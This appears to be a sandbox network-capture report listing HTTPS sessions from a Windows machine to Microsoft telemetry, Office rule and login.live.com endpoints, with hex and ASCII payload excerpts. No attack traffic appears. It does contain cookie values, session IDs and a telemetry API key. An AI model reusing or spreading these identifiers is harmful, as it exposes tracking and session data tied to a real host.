                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:48 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                        x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234948Z-178bfbc474btvfdfhC1NYCa2en00000000ug000000005adv
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        98192.168.2.54988640.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:49 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C515_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: f2f97c29-6e5c-4092-9b0c-2573b4a4479e
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF0001D954 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:49 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 11389
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        99192.168.2.54988820.189.173.94437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732146587120&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 11635
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC11635OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 32 33 3a 34 39 3a 34 37 2e 31 31 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 36 31 34 39 66 39 2d 63 33 62 34 2d 34 36 32 30 2d 38 37 65 32 2d 31 32 61 65 30 39 32 66 66 31 63 61 22 2c 22 65 70 6f 63 68 22 3a 22 34 30 31 35 31 30 38 37 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-20T23:49:47.117Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"2d6149f9-c3b4-4620-87e2-12ae092ff1ca","epoch":"401510876"},"app":{"locale"
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=1c16f074b26c415e951a091f7acd8978&HASH=1c16&LV=202411&V=4&LU=1732146589628; Domain=.microsoft.com; Expires=Thu, 20 Nov 2025 23:49:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: MS0=57e25210de0143008b115a0a1c60bb7f; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 00:19:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        time-delta-millis: 2508
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:49 GMT
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        100192.168.2.54988720.189.173.94437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732146587123&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 5093
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC5093OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 32 33 3a 34 39 3a 34 37 2e 31 32 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 36 31 34 39 66 39 2d 63 33 62 34 2d 34 36 32 30 2d 38 37 65 32 2d 31 32 61 65 30 39 32 66 66 31 63 61 22 2c 22 65 70 6f 63 68 22 3a 22 34 30 31 35 31 30 38 37 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-20T23:49:47.123Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"2d6149f9-c3b4-4620-87e2-12ae092ff1ca","epoch":"401510876"},"app":{"locale"
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=100e3d93e28d48f6853d66906dd8767f&HASH=100e&LV=202411&V=4&LU=1732146589660; Domain=.microsoft.com; Expires=Thu, 20 Nov 2025 23:49:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: MS0=a050adcd1f09414cb6337fba6e6a9ae6; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 00:19:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        time-delta-millis: 2537
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:49 GMT
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        101192.168.2.54988913.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:49 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                        x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234949Z-178bfbc474bwlrhlhC1NYCy3kg00000000rg000000008w6u
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        102192.168.2.54989113.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:50 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                        x-ms-request-id: be70f01e-301e-000c-538c-3a323f000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234950Z-r1d97b99577656nchC1TEBk98c00000009fg00000000tz4z
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        103192.168.2.54989213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:50 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                        x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234950Z-178bfbc474bmqmgjhC1NYCy16c00000000ug000000005kc1
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        104192.168.2.54989013.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:50 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                        Connection: close
